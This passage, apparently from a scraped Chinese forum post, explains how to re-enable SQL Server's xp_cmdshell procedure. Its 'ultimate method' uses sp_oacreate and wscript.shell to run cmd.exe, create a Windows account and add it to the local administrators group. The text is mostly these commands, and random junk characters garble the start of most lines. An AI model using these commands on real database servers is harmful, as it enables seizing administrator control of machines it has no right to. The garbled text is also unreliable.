, \/ E4 Z7 h" h+ ~7 _: y" g3 Y! ^0 V   恢复方法：查询分离器连接后,
3 n9 k- b, ^' N$ r9 u+ P第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
. T) I4 m+ ^$ C% O! P# o第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
$ Z+ |6 f" G  }然后按F5键命令执行完毕
. }3 G0 @4 R5 a" S6 i$ [. \
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126（找不到指定模块。）
恢复方法：查询分离器连接后,
$ [' @) K5 \, ^' O第一步执行：sp_dropextendedproc "xp_cmdshell"
2 M7 r7 F/ H' J. U第二步执行：sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键命令执行完毕

: F8 w4 a: r, A) Q- R3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
& ]* H, [2 z$ c5 Q恢复方法：查询分离器连接后,
( b3 [" e" V1 G' I第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
' y" Y' j: A2 z3 o/ `- w第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
' ^( M' S; z4 F& W  j. G1 |然后按F5键命令执行完毕

四.终极方法.
9 s, r& z. a+ C: U如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
查询分离器连接后,
" B! R2 v0 @, t7 t2000servser系统:
3 x2 V, o$ A8 l8 \& G& Edeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'

' w# K2 J; H" g6 Q2 t  N+ W( _declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'

9 K1 k9 Q5 ^3 g6 o. F$ hxp或2003server系统:
( j" p8 e1 n$ c2 g* P5 k9 X! I
/ `3 B: W% ~' W" D3 c5 y* Udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
: T% O5 C5 m) s, \" U7 G
% s5 A) J6 A- H% [6 ?' udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'